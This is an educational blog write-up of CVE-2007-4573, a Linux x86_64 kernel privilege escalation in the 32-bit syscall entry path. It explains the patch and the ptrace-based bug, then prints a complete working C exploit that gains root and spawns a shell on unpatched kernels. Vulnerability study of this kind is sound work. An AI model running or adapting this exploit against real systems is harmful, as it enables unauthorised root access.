CVE-2007-4573
is two years old at this point, but it remains one of my favorite
vulnerabilities. It was a local privilege-escalation vulnerability on
all x86_64
kernels prior to v2.6.22.7
. It’s very simple to
understand with a little bit of background, and the exploit is
super-simple, but it’s still more interesting than Yet Another NULL
Pointer Dereference. Plus, it was the first kernel bug I wrote an
exploit for, which was fun.
In this post, I’ll write up my exploit for CVE-2007-4573, and try to give enough background for someone with some experience with C, Linux, and a bit of x86 assembly to understand what’s going on. If you’re an experienced kernel hacker, you probably won’t find much new here, but if you’re not, hopefully you’ll get a sense for some of the pieces that go into a kernel exploit.
The patch 🔗︎
I’ll start out with the patch, or rather a slightly simplified version, that omits some hunks that will be irrelevant for my discussion. Then I’ll explain the context for the patch, and by that point we’ll have enough context to understand the exploit code.
A simplified version of the patch follows (The original is
176df245
in linus’s git repository) Note that this patch was applied to v2.6.22
– These files have moved around, so pull out an older kernel if
you’re trying to follow along at home:
--- a/arch/x86_64/ia32/ia32entry.S
+++ b/arch/x86_64/ia32/ia32entry.S
@@ -38,6 +38,18 @@
movq %rax,R8(%rsp)
.endm
+ .macro LOAD_ARGS32 offset
+ movl \offset(%rsp),%r11d
+ movl \offset+8(%rsp),%r10d
+ movl \offset+16(%rsp),%r9d
+ movl \offset+24(%rsp),%r8d
+ movl \offset+40(%rsp),%ecx
+ movl \offset+48(%rsp),%edx
+ movl \offset+56(%rsp),%esi
+ movl \offset+64(%rsp),%edi
+ movl \offset+72(%rsp),%eax
+ .endm
@@ -334,7 +346,7 @@ ia32_tracesys:
movq $-ENOSYS,RAX(%rsp) /* really needed? */
movq %rsp,%rdi /* &pt_regs -> arg1 */
call syscall_trace_enter
- LOAD_ARGS ARGOFFSET /* reload args from stack in case ptrace changed it */
+ LOAD_ARGS32 ARGOFFSET /* reload args from stack in case ptrace changed it */
RESTORE_REST
jmp ia32_do_syscall
END(ia32_syscall)
The patch defines the IA32_LOAD_ARGS
macro, and replaces LOAD_ARGS
with it in several places (I’ve only shown one for
simplicity). LOAD_ARGS32
differs only slightly from the LOAD_ARGS
macro that it is replacing, which is defined in
include/asm-x86_64/calling.h
:
.macro LOAD_ARGS offset
movq \offset(%rsp),%r11
movq \offset+8(%rsp),%r10
movq \offset+16(%rsp),%r9
movq \offset+24(%rsp),%r8
movq \offset+40(%rsp),%rcx
movq \offset+48(%rsp),%rdx
movq \offset+56(%rsp),%rsi
movq \offset+64(%rsp),%rdi
movq \offset+72(%rsp),%rax
.endm
As the name suggests, LOAD_ARGS32
loads the registers from the stack
as 32-bit values, rather than 64-bit. Importantly, in doing so it
takes advantage of a quirk in the x86_64
architecture, that causes
the top 32 bits of the registers to be zeroed if you write to the
32-bit versions. LOAD_ARGS32
thus zero-extends the 32-bit values it
loads into the 64-bit registers.
System call handling 🔗︎
So, why is this patch so important? Let’s look at the context for the
LOAD_ARGS
→ LOAD_ARGS32
change. ia32entry.S
contains the
definitions for entry-points for 32-bit compatibility-mode system
calls on an x86_64
processor. In other words, for 32-bit processes
running on the 64-bit machine, or for 64-bit processes that use
old-style int $0x80
system calls for whatever reason.
There are three entry points in the file, one for 32-bit SYSCALL
instructions, one for 32-bit SYSENTER
, and one for int $0x80
. They
are all very similar, and we will only consider the int $0x80
case
here. At boot-time, Linux configures the processor so that int $0x80
will dispatch to the ia32_syscall
entry point. Ignoring a bunch of
debugging information, tracing, and other junk, this entry point’s
code is essentially simple:
ENTRY(ia32_syscall)
movl %eax,%eax
pushq %rax
SAVE_ARGS 0,0,1
GET_THREAD_INFO(%r10)
orl $TS_COMPAT,TI_status(%r10)
testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%r10)
jnz ia32_tracesys
cmpl $(IA32_NR_syscalls-1),%eax
ja ia32_badsys
ia32_do_call:
IA32_ARG_FIXUP
call *ia32_sys_call_table(,%rax,8)
movq %rax,RAX-ARGOFFSET(%rsp)
jmp int_ret_from_sys_call
%eax
, according to Linux’s syscall convention, stores the syscall number. The mov
zero-extends it into %rax
, and then we save it and the syscall arguments onto the stack.
The next block retrieves the struct thread_info
for the current task, sets the TS_COMPAT
status bit to indicate that we’re handling a 32-bit compatibility mode syscall, and then
checks the thread’s flags to determine whether this thread has been flagged for extra processing on syscall entry. If so, we jump away to
code to handle that work.
Next (at the cmpl
), we check to make sure that the requested syscall is in-bounds, and branch to an error path if not.
IA32_ARG_FIXUP
is a simple macro that moves registers around to
translate between the Linux syscall calling convention and the
x86_64
calling convention, which each hold arguments in different
registers. Once we’ve fixed up the registers, the call
instruction indexes the system call table by the system call number, looks up the address stored there, and calls into it to dispatch the syscall.
Finally, we save the return code from the system call into the register area on the stack, and jump to code to handle the return to userspace.
One thing we should notice about this code is that when we
check that the syscall is in bounds, we compare against the 32-bit
%eax
register, but when we actually dispatch the syscall, we use
the full 64 bits in %rax
. The movl
at the top of the function serves to zero-extend %eax
, so that normally, the top 32 bits of %rax
are zero, and this distinction doesn’t matter.
The problem arises in the “traced” path in ia32_tracesys
, which is (again, with some
extra code removed):
ia32_tracesys:
movq %rsp,%rdi /* &pt_regs -> arg1 */
call syscall_trace_enter
LOAD_ARGS ARGOFFSET /* reload args from stack in case ptrace changed it */
jmp ia32_do_call
Essentially, ia32_tracesys
just calls into the C function
syscall_trace_enter
, with a pointer to the registers saved on the stack,
and then restores the register values from the stack and jumps back to
execute the system call.
Herein lies the problem. If syscall_trace_enter
replaces the on-stack %rax
with a 64-bit value, and LOAD_ARGS
restores it, then the %eax
/%rax
distinction above becomes a problem.
Aas long as %eax
is less than (IA32_NR_syscalls-1)
, %rax
can be much larger than the size of the syscall table, causing the call
to index off the end of it.
ptrace(2) 🔗︎
So what happens inside syscall_trace_enter
, and how can we take
advantage of that to load a 64-bit value into the restored %rax
?
Well, that turns out to be the code that handles processes traced by
the ptrace(2)
process-tracing mechanism, which among other things,
allows the tracer to stop a child process before each system call, and
inspect and modify the child’s registers for the system call procedes.
Reading ptrace(2)
, we find that we can use ptrace(PTRACE_SYSCALL,…)
to cause a process to execute until its next system call, and then,
once it’s stopped, we can use ptrace(PTRACE_POKEUSER,…)
to modify
the tracee’s registers.
Putting it all together 🔗︎
So, to exploit this bug, we need to:
- Have a 64-bit process attach to some process with
ptrace
. - Use
PTRACE_SYSCALL
to stop that process at its next syscall - Have the process execute an
int $0x80
- Have the parent modify
%rax
in the child to be 64 bits wide, and allow the child to continue.
At this point, the child will index waaay off the end of the syscall
table – so far off, in fact, that it will wrap around past the end of
memory (On x86_64
, the entire kernel is mapped into the last
2 GB of address space). Since the kernel and user programs run in the same
address space, this means that, with an appropriate choice of %rax
, the kernel will dereference an address
in the user address space to find out the address of the function it should jump to in order to handle the system call.
My entire exploit code follows. This is not fully weaponized at all – it depends on tweaking for the specific target kernel, for one, but it works. (Well, if you can find an unpatched kernel anywhere any more these days, it works). Nowadays, if I were writing an exploit like this, I’d plug it into something like Brad Spengler’s Enlightenment, which takes care of most of the annoying bits of executing shell-code in-kernel to change the current user, disable any security modules that might be problematic, and work across kernel versions, as necessary.
#include <sys/ptrace.h>
#include <sys/user.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
#include <stddef.h>
/**
* Replace these with the values of `ia32_sys_call_table' and
* `set_user' from /proc/kallsyms or /boot/System.map-$(uname -r)
*/
#define syscall_table 0xffffffff8044b8a0
#define set_user 0xffffffff8028d785
/*
We don't _need_ these -- with only a little bit of cleverness, we can
get around not knowing them, but having them will make the code
simpler.
set_user is defined in kernel/sys.c, and can be used to change the
UID of the current process. We'll trick the kernel into call it on
our behalf, and thus avoid having to write any code to run in
kernel-mode ourselves.
*/
#define offset (1L << 32)
#define landing (syscall_table + 8*offset)
/*
'offset' is the 64-bit value we will load into %rax using ptrace().
This will cause the "call" instruction we saw above to look up the
value stored at that index off the syscall table, which is the
address we compute in "landing".
*/
int main() {
if((signed long)mmap((void*)(landing&~0xFFF), 4096,
PROT_READ|PROT_EXEC|PROT_WRITE,
MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,
0, 0) < 0) {
perror("mmap");
exit(-1);
}
*(long*)landing = set_user;
/*
We use mmap(2) to map a page at "landing", and write a
pointer to the set_user function there.
*/
pid_t child;
child = fork();
/*
We fork two processes. The parent will ptrace the child, and
the child will execute the `int 0x80` syscall.
*/
if(child == 0) {
ptrace(PTRACE_TRACEME, 0, NULL, NULL);
kill(getpid(), SIGSTOP);
/*
We ask for someone to trace us, and then signal
ourselves, which causes us to wait for our parent to
attach via `ptrace`.
*/
__asm__("movl $0, %ebx\n\t"
"int $0x80\n");
/*
We then make an (arbitrary) syscall via int 0x80,
with %ebx set to 0. Linux's system call convention
stores the first argument in %ebx, so if all goes
right, when our parent mucks with %rax, this will
result in the kernel calling set_user(0), setting
our current UID to 0.
*/
execl("/bin/sh", "/bin/sh", NULL);
/* Once we have root, we exec a shell. */
} else {
wait(NULL);
ptrace(PTRACE_SYSCALL, child, NULL, NULL);
wait(NULL);
ptrace(PTRACE_POKEUSER, child, offsetof(struct user, regs.orig_rax),
(void*)offset);
ptrace(PTRACE_DETACH, child, NULL, NULL);
wait(NULL);
/*
In the parent we need to do is `wait` for the child
to stop, allow it to advance until the next syscall,
use `PTRACE_POKEUSER` to poke `offset` into `%rax`,
and then detach and let it run.
*/
}
}